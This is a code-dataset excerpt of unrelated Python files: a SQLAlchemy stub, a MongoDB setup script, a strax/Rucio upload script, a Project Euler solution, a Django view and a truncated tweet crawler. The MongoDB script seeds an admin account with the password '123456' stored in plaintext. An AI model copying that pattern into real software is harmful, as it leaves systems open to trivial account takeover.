AsyncEngine\nfrom ... 
import util as util\nfrom ...engine import Result as Result\nfrom ...orm import Session as Session\nfrom ...sql import Executable as Executable\nfrom ...util.concurrency import greenlet_spawn as greenlet_spawn\n\n_T = TypeVar(\"_T\")\n\nclass AsyncSession:\n dispatch: Any = ...\n bind: Any = ...\n binds: Any = ...\n sync_session: Any = ...\n def __init__(\n self,\n bind: AsyncEngine = ...,\n binds: Mapping[object, AsyncEngine] = ...,\n **kw: Any,\n ) -> None: ...\n async def refresh(\n self,\n instance: Any,\n attribute_names: Optional[Any] = ...,\n with_for_update: Optional[Any] = ...,\n ): ...\n async def run_sync(\n self, fn: Callable[..., _T], *arg: Any, **kw: Any\n ) -> _T: ...\n async def execute(\n self,\n statement: Executable,\n params: Optional[Mapping] = ...,\n execution_options: Mapping = ...,\n bind_arguments: Optional[Mapping] = ...,\n **kw: Any,\n ) -> Result: ...\n async def scalar(\n self,\n statement: Executable,\n params: Optional[Mapping] = ...,\n execution_options: Mapping = ...,\n bind_arguments: Optional[Mapping] = ...,\n **kw: Any,\n ) -> Any: ...\n async def get(\n self,\n entity: Any,\n ident: Any,\n options: Optional[Any] = ...,\n populate_existing: bool = ...,\n with_for_update: Optional[Any] = ...,\n identity_token: Optional[Any] = ...,\n ): ...\n async def stream(\n self,\n statement: Any,\n params: Optional[Any] = ...,\n execution_options: Any = ...,\n bind_arguments: Optional[Any] = ...,\n **kw: Any,\n ): ...\n async def merge(self, instance: Any, load: bool = ...): ...\n async def flush(self, objects: Optional[Any] = ...) -> None: ...\n async def connection(self): ...\n def begin(self, **kw: Any): ...\n def begin_nested(self, **kw: Any): ...\n async def rollback(self): ...\n async def commit(self): ...\n async def close(self): ...\n @classmethod\n async def close_all(self): ...\n async def __aenter__(self): ...\n async def __aexit__(\n self, type_: Any, value: Any, traceback: Any\n ) -> None: ...\n\nclass _AsyncSessionContextManager:\n async_session: Any = ...\n def __init__(self, async_session: Any) -> None: ...\n trans: Any = ...\n async def __aenter__(self): ...\n async def __aexit__(\n self, type_: Any, value: Any, traceback: Any\n ) -> None: ...\n\nclass AsyncSessionTransaction(StartableContext):\n session: Any = ...\n nested: Any = ...\n sync_transaction: Any = ...\n def __init__(self, session: Any, nested: bool = ...) 
-> None: ...\n @property\n def is_active(self): ...\n async def rollback(self) -> None: ...\n async def commit(self) -> None: ...\n async def start(self): ...\n async def __aexit__(self, type_: Any, value: Any, traceback: Any): ...\n","sub_path":"sqlalchemy-stubs/ext/asyncio/session.pyi","file_name":"session.pyi","file_ext":"pyi","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"284566331","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom datetime import datetime\n\nprint('__name__ = ', __name__)\n\n\ndef _get_db(function):\n def wrapper(*args, **kwargs):\n try:\n db = args[0].db.client[args[1]]\n return function(db, *args, **kwargs)\n except Exception as e:\n raise\n return wrapper\n\n\ndef drop_mongodb(mongo, db_name):\n # Drop the database if it exists\n mongo.db.client.drop_database(db_name)\n\n # Select the database\n db = mongo.db.client[db_name]\n # db => \n\n # Drop the collections\n db.drop_collection('users')\n db.drop_collection('acompanies')\n db.drop_collection('ausers')\n db.drop_collection('rows')\n db.drop_collection('transactions')\n db.drop_collection('history')\n\n\ndef add_default_data_in_mongodb(mongo, db_name):\n # Select the database\n db = mongo.db.client[db_name]\n\n # Add documents to the 'users' collection\n object_id = db.users.save({\n 'username': 'admin',\n 'password': '123456',\n 'email': 'admin@strategic.com',\n 'active': 1,\n 'level': 1,\n 'confirmed': 1,\n 'date': datetime.utcnow(),\n 'last_update': datetime.utcnow(),\n })\n # More users\n # db.users.save({'name': 'user 2', 'level': 2})\n # db.users.insert({'name': 'user 3', 'level': 3})\n\n@_get_db\ndef print_all_users(*args):\n db = args[0]\n for user in db.users.find():\n print(user)\n\n\ndef init_db(app, mongo):\n \"\"\"Initializes the database.\"\"\"\n\n db_name = app.config.get('MONGO_DBNAME', app.name)\n print('db_name: ', db_name)\n\n # Clean up: drop the database\n drop_mongodb(mongo, db_name)\n\n # Add the default data\n add_default_data_in_mongodb(mongo, db_name)\n\n\n # Select the database\n db = mongo.db.client[db_name]\n\n # # Full collection name\n # print(db.users.full_name)\n\n # # Get all documents\n # for user in db.users.find():\n # print(user)\n\n print_all_users(mongo, db_name)\n\n build_table(mongo, db_name)\n\n # db.acompanies.insert([\n # {\"_id\": \"microsoft\", \"year\": 1974, \"date\": datetime.utcnow()},\n # {\"_id\": \"aple\", \"year\": 1975, \"date\": datetime.utcnow()},\n # ])\n # acompanies = db.acompanies.find()\n # for acompanie in acompanies:\n # print(acompanie['date'], type(acompanie['date']))\n\n return\n\n # ---------------------------\n\n # platform_id = db.platform.insert({})\n # object_id = db.rows.insert({\n # 'data': '19.02.2013',\n # 'amount': 1000,\n # 'account': 'Gk298',\n # 'subaccount': 'LG',\n # 'platform': 'Prosper',\n # })\n # result = db.objects.insert_one({\"last_modified\": datetime.datetime.utcnow()})\n db.acompanies.insert([\n {\"_id\": \"microsoft\", \"year\": 1974, \"date\": datetime.utcnow()},\n {\"_id\": \"aple\", \"year\": 1975, \"date\": datetime.utcnow()},\n ])\n db.ausers.insert({'name': \"Tom\", 'age': 28, 'company': \"microsoft\"})\n db.ausers.insert({'name': \"ura\", 'age': 30, 'company': \"aple\"})\n user = db.ausers.find_one()\n # user['company']\n comp = db.acompanies.find_one({'_id': user['company']})\n # print(comp)\n print(user)\n\n \"\"\"\n users = db.ausers.find()\n for user in users:\n print(user)\n\n acompanies = db.acompanies.find()\n for acompanie in acompanies:\n 
print(acompanie)\n\n parent = db.acompanies.find_one( {\"_id\": \"microsoft\" }, { \"parent\": 1, \"alias\":1, \"title\":1})\n \"\"\"\n \"\"\"\n # db.ausers.aggregate([ { $match: {$or:[{type:\"blogs\"},{type:\"user\"}]} } ])\n print('-'*100)\n cursor = db.ausers.aggregate(\n [\n {\"$group\": {\"_id\": \"microsoft\", \"count\": {\"$sum\": 1}}}\n ]\n )\n print(cursor)\n for cur in cursor:\n print(cur)\n\n users = db.ausers.find( { 'company': { '$in': [\"microsoft\", \"aple\"] } } )\n print(users)\n print( list(users) )\n \"\"\"\n\ndef build_table(mongo, db_name):\n\n doc = [\n {'date': '07.05.2012', 'amount': 3000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '07.09.2012', 'amount': 7000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '05.10.2012', 'amount': 5000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '06.11.2012', 'amount': 5000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '27.12.2012', 'amount': 20000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '05.02.2013', 'amount': 10000, 'account': 'Poster_inv', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '19.02.2013', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '20.03.2013', 'amount': 2000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '09.05.2013', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '20.05.2013', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '28.06.2013', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '14.08.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '03.09.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '12.09.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '16.09.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '27.09.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '02.10.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '16.10.2013', 'amount': 100, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '31.10.2013', 'amount': 400, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '09.11.2013', 'amount': 500, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '05.03.2014', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '07.04.2014', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '20.05.2014', 'amount': 1000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '29.02.2016', 'amount': 2000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '28.04.2016', 'amount': 5000, 'account': 'Gk298', 'subaccount': '', 'platform': 'Prosper'},\n {'date': '23.07.2013', 'amount': 100000, 'account': 'SS1', 'subaccount': 'LG', 'platform': 'Prosper'},\n {'date': '20.08.2013', 'amount': 50000, 'account': 'SS1', 'subaccount': 'LG', 'platform': 'Lending Club'},\n {'date': '04.11.2013', 'amount': 100000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '27.11.2013', 'amount': 35000, 'account': 
'SS1', 'subaccount': 'LG', 'platform': 'Lending Club'},\n {'date': '05.12.2013', 'amount': 1500, 'account': 'SS1', 'subaccount': 'LG', 'platform': 'Lending Club'},\n {'date': '05.12.2013', 'amount': 13500, 'account': 'SS1', 'subaccount': 'LG', 'platform': 'Lending Club'},\n {'date': '24.01.2014', 'amount': 45000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '30.01.2014', 'amount': 20000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Prosper'},\n {'date': '12.02.2014', 'amount': 10000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Prosper'},\n {'date': '30.01.2014', 'amount': 50000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '12.02.2014', 'amount': 58900, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '21.02.2014', 'amount': 80000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '28.02.2014', 'amount': 50000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '08.07.2014', 'amount': 250000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '25.07.2014', 'amount': 50000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Prosper'},\n {'date': '27.12.2014', 'amount': 10000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Prosper'},\n {'date': '04.01.2015', 'amount': 25000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '05.01.2015', 'amount': 40000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '06.01.2015', 'amount': 100000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '09.01.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'ED', 'platform': 'Lending Club'},\n {'date': '04.02.2015', 'amount': 30000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '11.02.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '18.02.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '27.02.2015', 'amount': 10000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '27.02.2015', 'amount': 120000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '03.03.2015', 'amount': 15000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '08.03.2015', 'amount': 10000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '28.02.2015', 'amount': 15000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '10.03.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '13.03.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '16.03.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '20.03.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '25.03.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '01.02.2015', 'amount': -3928, 'account': 'SS1', 'subaccount': 'SSM', 'platform': 'Prosper'},\n {'date': '01.02.2015', 'amount': -28782, 'account': 'SS1', 'subaccount': 'SSM', 'platform': 'Lending Club'},\n {'date': '02.04.2015', 'amount': 50000, 'account': 'SS1', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n 
{'date': '23.04.2015', 'amount': -50000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '14.01.2016', 'amount': -70000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '23.01.2016', 'amount': -25823, 'account': 'SS1', 'subaccount': 'SSM', 'platform': 'Prosper'},\n {'date': '01.07.2016', 'amount': -6000, 'account': 'SS1', 'subaccount': 'AF', 'platform': 'Lending Club'},\n {'date': '20.06.2014', 'amount': 100000, 'account': 'SS2', 'subaccount': 'AV', 'platform': 'Prosper'},\n {'date': '11.07.2014', 'amount': 100000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '22.02.2015', 'amount': 10000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '27.02.2015', 'amount': 15000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '05.01.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '12.04.2015', 'amount': 5000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '15.04.2015', 'amount': 25, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '24.04.2015', 'amount': 5000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Lending Club'},\n {'date': '28.04.2015', 'amount': 10000, 'account': 'SS2', 'subaccount': 'Trust', 'platform': 'Prosper'},\n {'date': '29.04.2015', 'amount': 50000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '01.05.2015', 'amount': 50000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '05.05.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '07.05.2015', 'amount': 10000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Prosper'},\n {'date': '12.05.2015', 'amount': 10000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Prosper'},\n {'date': '19.05.2015', 'amount': 20000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '21.05.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '26.05.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'RS', 'platform': 'Lending Club'},\n {'date': '25.06.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'MF', 'platform': 'Lending Club'},\n {'date': '30.06.2015', 'amount': 150000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Lending Club'},\n {'date': '01.07.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Lending Club'},\n {'date': '02.07.2015', 'amount': 10000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Prosper'},\n {'date': '15.07.2015', 'amount': 25000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Prosper'},\n {'date': '22.07.2015', 'amount': 50000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Lending Club'},\n {'date': '23.07.2015', 'amount': 50000, 'account': 'SS2', 'subaccount': 'KB', 'platform': 'Lending Club'},\n {'date': '23.01.2016', 'amount': -7000, 'account': 'SS2', 'subaccount': 'SSM', 'platform': 'Prosper'},\n {'date': '23.01.2016', 'amount': -3982, 'account': 'SS2', 'subaccount': 'SSM', 'platform': 'Lending Club'},\n ]\n new_doc = []\n for item in doc:\n item['date'] = datetime.strptime(item['date'], \"%d.%m.%Y\").replace(tzinfo=None)\n item['last_update'] = datetime.utcnow()\n new_doc.append(item)\n\n # Select the database\n db = mongo.db.client[db_name]\n\n object_id = db.rows.insert(new_doc)\n # print(object_id)\n\n # rows = 
db.rows.find().sort('date', 1)\n # for item in rows:\n # # dt = item['date']\n # print(str(item['date']), item['date'].strftime(\"%m/%d/%Y\"))\n\n sdt = datetime.strptime('01.07.2016', \"%d.%m.%Y\")\n rows = db.rows.find({'date': sdt})\n print(rows)\n for item in rows:\n print(item)\n\n\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":15062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168315485","text":"#!/usr/bin/env python\n# import logging\n# logging.basicConfig(level='DEBUG')\nimport argparse\nimport os\nimport shutil\nimport numpy as np\nimport strax\nimport straxen\nimport datetime\nfrom admix.utils.naming import make_did\nfrom admix.interfaces.rucio_summoner import RucioSummoner\nimport rucio\nfrom rucio.client.client import Client\nfrom rucio.client.uploadclient import UploadClient\nfrom utilix import DB\nfrom pprint import pprint\nfrom immutabledict import immutabledict\n\ndb = DB()\n\ndef apply_global_version(context, cmt_version):\n context.set_config(dict(gain_model=('CMT_model', (\"to_pe_model\", cmt_version))))\n context.set_config(dict(s2_xy_correction_map=(\"CMT_model\", ('s2_xy_map', cmt_version), True)))\n context.set_config(dict(elife_conf=(\"elife\", cmt_version, True)))\n context.set_config(dict(mlp_model=(\"CMT_model\", (\"mlp_model\", cmt_version), True)))\n context.set_config(dict(gcn_model=(\"CMT_model\", (\"gcn_model\", cmt_version), True)))\n context.set_config(dict(cnn_model=(\"CMT_model\", (\"cnn_model\", cmt_version), True)))\n\n\ndef get_hashes(st):\n hashes = set([(d, st.key_for('0', d).lineage_hash)\n for p in st._plugin_class_registry.values()\n for d in p.provides if p.save_when == strax.SaveWhen.ALWAYS])\n return {dtype: h for dtype, h in hashes}\n\n\ndef merge(runid_str, # run number padded with 0s\n dtype, # data type 'level' e.g. records, peaklets\n st, # strax context\n path # path where the data is stored\n ):\n\n # get the storage path, since will need to reset later\n _storage_paths = [storage.path for storage in st.storage]\n\n # initialize plugin needed for processing\n plugin = st._get_plugins((dtype,), runid_str)[dtype]\n st._set_plugin_config(plugin, runid_str, tolerant=False)\n plugin.setup()\n\n for keystring in plugin.provides:\n key = strax.DataKey(runid_str, keystring, plugin.lineage)\n saver = st.storage[0].saver(key, plugin.metadata(runid_str, keystring))\n # monkey patch the saver\n tmpname = os.path.split(saver.tempdirname)[1]\n dirname = os.path.split(saver.dirname)[1]\n saver.tempdirname = os.path.join(path, tmpname)\n saver.dirname = os.path.join(path, dirname)\n saver.is_forked = True\n # merge the jsons\n saver.close()\n\n # change the storage frontend to use the merged data\n st.storage[0] = strax.DataDirectory(path)\n\n # rechunk the data if we can\n for keystring in plugin.provides:\n rechunk = True\n if isinstance(plugin.rechunk_on_save, immutabledict):\n if not plugin.rechunk_on_save[keystring]:\n rechunk = False\n else:\n if not plugin.rechunk_on_save:\n rechunk = False\n\n if rechunk:\n print(f\"Rechunking {keystring}\")\n st.copy_to_frontend(runid_str, keystring, 1, rechunk=True)\n else:\n print(f\"Not rechunking {keystring}. 
Just copy to the staging directory.\")\n key = st.key_for(runid_str, keystring)\n src = os.path.join(st.storage[0].path, str(key))\n dest = os.path.join(st.storage[1].path, str(key))\n shutil.copytree(src, dest)\n\n # reset in case we need to merge more data\n st.storage = [strax.DataDirectory(path) for path in _storage_paths]\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Combine strax output\")\n parser.add_argument('dataset', help='Run number', type=int)\n parser.add_argument('dtype', help='dtype to combine')\n parser.add_argument('--context', help='Strax context')\n parser.add_argument('--input', help='path where the temp directory is')\n parser.add_argument('--rse', help='RSE to upload to')\n parser.add_argument('--cmt', help='CMT global version')\n parser.add_argument('--update-db', help='flag to update runsDB', dest='update_db',\n action='store_true')\n parser.add_argument('--upload-to-rucio', help='flag to upload to rucio', dest='upload_to_rucio',\n action='store_true')\n\n args = parser.parse_args()\n\n runid = args.dataset\n runid_str = \"%06d\" % runid\n dtype = args.dtype\n path = args.input\n\n final_path = 'finished_data'\n\n # get context\n st = getattr(straxen.contexts, args.context)()\n st.storage = [strax.DataDirectory('./'),\n strax.DataDirectory(final_path) # where we are copying data to\n ]\n apply_global_version(st, args.cmt)\n\n # check what data is in the output folder\n dtypes = [d.split('-')[1] for d in os.listdir(path)]\n\n if 'records' in dtypes:\n plugin_levels = ['records', 'peaklets']\n else:\n plugin_levels = ['peaklets']\n\n # merge\n for dtype in plugin_levels:\n print(f\"Merging {dtype} level\")\n merge(runid_str, dtype, st, path)\n\n\n print(f\"Current contents of {final_path}:\")\n print(os.listdir(final_path))\n\n # now upload the merged metadata\n # setup the rucio client(s)\n if not args.upload_to_rucio:\n print(\"Ignoring rucio upload. 
Exiting\")\n return\n\n # need to patch the storage one last time\n st.storage = [strax.DataDirectory(final_path)]\n\n updonkey = UploadClient()\n donkey = Client()\n\n for this_dir in os.listdir(final_path):\n # prepare list of dicts to be uploaded\n _run, keystring, straxhash = this_dir.split('-')\n dataset_did = make_did(runid, keystring, straxhash)\n scope, dset_name = dataset_did.split(':')\n\n files = os.listdir(os.path.join(final_path, this_dir))\n to_upload = []\n existing_files = [f for f in donkey.list_dids(scope, {'type': 'file'}, type='file')]\n existing_files = [f for f in existing_files if dset_name in f]\n\n try:\n existing_files_in_dataset = [f['name'] for f in donkey.list_files(scope, dset_name)]\n except rucio.common.exception.DataIdentifierNotFound:\n existing_files_in_dataset = []\n\n\n # for some reason files get uploaded but not attached correctly\n need_attached = list(set(existing_files) - set(existing_files_in_dataset))\n\n if len(need_attached) > 0:\n dids_to_attach = [dict(scope=scope, name=name) for name in need_attached]\n\n donkey.attach_dids(scope, dset_name, dids_to_attach)\n\n for f in files:\n if f in existing_files:\n print(f\"Skipping {f} since it is already uploaded\")\n continue\n\n this_path = os.path.join(final_path, this_dir, f)\n d = dict(path=this_path,\n did_scope=scope,\n did_name=f,\n dataset_scope=scope,\n dataset_name=dset_name,\n rse=args.rse,\n register_after_upload=True\n )\n to_upload.append(d)\n\n # now do the upload!\n if len(to_upload) == 0:\n print(f\"No files to upload for {this_dir}\")\n continue\n\n # now do the upload!\n try:\n updonkey.upload(to_upload)\n except:\n print(f'Upload of {keystring} failed')\n raise\n print(f\"Upload of {len(files)} files in {this_dir} finished successfully\")\n for f in files:\n print(f\"{scope}:{f}\")\n\n # now check the rucio data matche what we expect\n rucio_files = [f for f in donkey.list_files(scope, dset_name)]\n\n # how many chunks?\n md = st.get_meta(runid_str, keystring)\n\n expected_chunks = len([c for c in md['chunks'] if c['n']>0])\n\n # we should have n+1 files in rucio (counting metadata)\n if len(rucio_files) != expected_chunks + 1:\n # we're missing some data, uh oh\n successful_chunks = set([int(f['name'].split('-')[-1]) for f in rucio_files])\n expected_chunks = set(np.arange(expected_chunks))\n\n missing_chunks = expected_chunks - successful_chunks\n\n missing_chunk_str = '/n'.join(missing_chunks)\n raise RuntimeError(f\"File mismatch! There are {len(rucio_files)} but the metadata thinks there \"\n f\"should be {expected_chunks} chunks + 1 metadata. 
\"\n f\"The missing chunks are:\\n{missing_chunk_str}\")\n\n chunk_mb = [chunk['nbytes'] / (1e6) for chunk in md['chunks']]\n data_size_mb = np.sum(chunk_mb)\n avg_data_size_mb = np.mean(chunk_mb)\n\n # let's do one last check of the rule\n rc = RucioSummoner()\n\n rses = [args.rse]\n if (keystring not in ['records', 'veto_regions', 'pulse_counts']\n and \"UC_DALI_USERDISK\" not in rses):\n rses.append('UC_DALI_USERDISK')\n\n\n for rse in rses:\n rule = rc.GetRule(dataset_did, rse)\n if rule['state'] == 'OK':\n status = 'transferred'\n elif rule['state'] == 'REPLICATING':\n status = 'transferring'\n else:\n status = 'error'\n\n if args.update_db:\n # update runDB\n new_data_dict = dict()\n new_data_dict['location'] = rse\n new_data_dict['did'] = dataset_did\n new_data_dict['status'] = status\n new_data_dict['host'] = \"rucio-catalogue\"\n new_data_dict['type'] = keystring\n new_data_dict['protocol'] = 'rucio'\n new_data_dict['creation_time'] = datetime.datetime.utcnow().isoformat()\n new_data_dict['creation_place'] = \"OSG\"\n #new_data_dict['file_count'] = file_count\n new_data_dict['meta'] = dict(#lineage=plugin.lineage_hash,\n avg_chunk_mb=avg_data_size_mb,\n file_count=len(rucio_files),\n size_mb=data_size_mb,\n strax_version=strax.__version__,\n straxen_version=straxen.__version__\n )\n\n db.update_data(runid, new_data_dict)\n\n\n print(f\"Database updated for {keystring} at {rse}\")\n else:\n print(\"Skipping database update.\")\n\n\n # if everything is good, let's close the dataset\n # this will make it so no more data can be added to this dataset\n if status == 'transferred':\n try:\n donkey.close(scope, dset_name)\n except:\n print(f\"Closing {scope}:{dset_name} failed\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"outsource/workflow/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":10700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"547027776","text":"### https://www.projecteuler.net/problem=62\n\nimport sys\nsys.path.append(r'..\\euler')\nimport common as euler\nimport time\n\ndef Problem62(n: int):\n ''' For a positive integer n, returns the smallest\n cube that has n digit permutations which are also cubes'''\n\n # Initialise some numbers\n start_time = time.time()\n digits = 1\n cubes = {}\n permutations = []\n\n if (n == 1):\n return 1\n\n i = 1\n while True:\n new_cube = i * i * i\n\n # If we hit a number with more digits than the previous, we can reset the problem\n if (len(str(new_cube)) > digits):\n cubes = {}\n permutations = []\n digits += len(str(new_cube))\n\n found_permutation = False\n # First of all, let's try to find a permutation in the existing permutation groups\n for permutation in permutations:\n if (euler.is_permutation(new_cube, permutation[0])):\n found_permutation = True\n permutation.append(new_cube)\n # If this permutation has now reached n items, we return the smallest (always the first) number\n if (len(permutation) == n):\n return permutation[0], '%.3f s' % (time.time() - start_time)\n\n # If we didn't find any permutations so far, we search for one amongst the so far unused cubes\n if (not found_permutation):\n # cubes is a dict where values are grouped by a key which is the digit sum\n # this is useful because all candidate permutations will necessary have equal digit sum\n key = euler.sum_digits(new_cube)\n if (key in cubes):\n for cube in cubes[key]:\n # If we find a permutation, we insert the new pair in the permutations list\n # We also remove the 
cube from the singles collection, for we don't need to check it again\n if (euler.is_permutation(new_cube, cube)):\n found_permutation = True\n permutations.append([cube, new_cube])\n cubes[key].remove(cube)\n # In the special case where n is 2, the first found permutation gives us the result\n if (n == 2):\n return cube, '%.3f s' % (time.time() - start_time)\n\n # If no permutations were found, we add this to the singles list\n if (not found_permutation):\n cubes[key].append(new_cube)\n\n else:\n cubes[key] = []\n cubes[key].append(new_cube)\n\n i = i + 1","sub_path":"Page2/problem62.py","file_name":"problem62.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"160161771","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\n\nfrom .models import Instruction, Step, Equipment\n\ndef index(request):\n template = loader.get_template('install/index.html')\n\n instruction_list = Instruction.objects.all()\n step_list = Step.objects.all()\n equipment_list = Equipment.objects.all()\n\n extras = dict()\n extras['steps'] = Step.objects.all()\n extras['instruction_list'] = instruction_list\n extras['equipment_list'] = Equipment.objects.all()\n\n context = {\n 'instruction_list': instruction_list,\n 'step_list': step_list,\n 'equipment_list': equipment_list\n }\n return HttpResponse(template.render(context=context, request=request))\n","sub_path":"toolsuite/install/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"406890594","text":"import got\nfrom datetime import date\nfrom datetime import timedelta\nfrom time import strftime\nfrom time import sleep\nimport shadowsocks\nimport sys\nimport os\nimport logging\nimport signal\nimport pickle\nimport multiprocessing\nimport random\nfrom shadowsocks import shell, daemon, eventloop, tcprelay, udprelay, asyncdns\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))\n\n#extract tweets of a certain day\ndef crawl1DayTweet(f, currentDate, company, lang):\n\ts = strftime(\"%Y-%m-%d\", currentDate.timetuple())\n\te = strftime(\"%Y-%m-%d\", (currentDate + timedelta(1)).timetuple())\n\n\t#In got/manager/TweetCriteria.py, you can find what parameters can be set.\n\ttweetCriteria = got.manager.TweetCriteria().setQuerySearch(company).setLang(lang).setSince(s).setUntil(e).setMaxTweets(10000)\n\ttweets = got.manager.TweetManager.getTweets(tweetCriteria)\n\tif tweets is None:\n\t\treturn False\n\n\tfor t in reversed(tweets):\n\t\tf.write(t.id.encode('utf-8') + '\\t' + t.username.encode('utf-8') + '\\t' + str(t.date) + '\\t' +\n\t\t\tt.geo.encode('utf-8') + '\\t' + 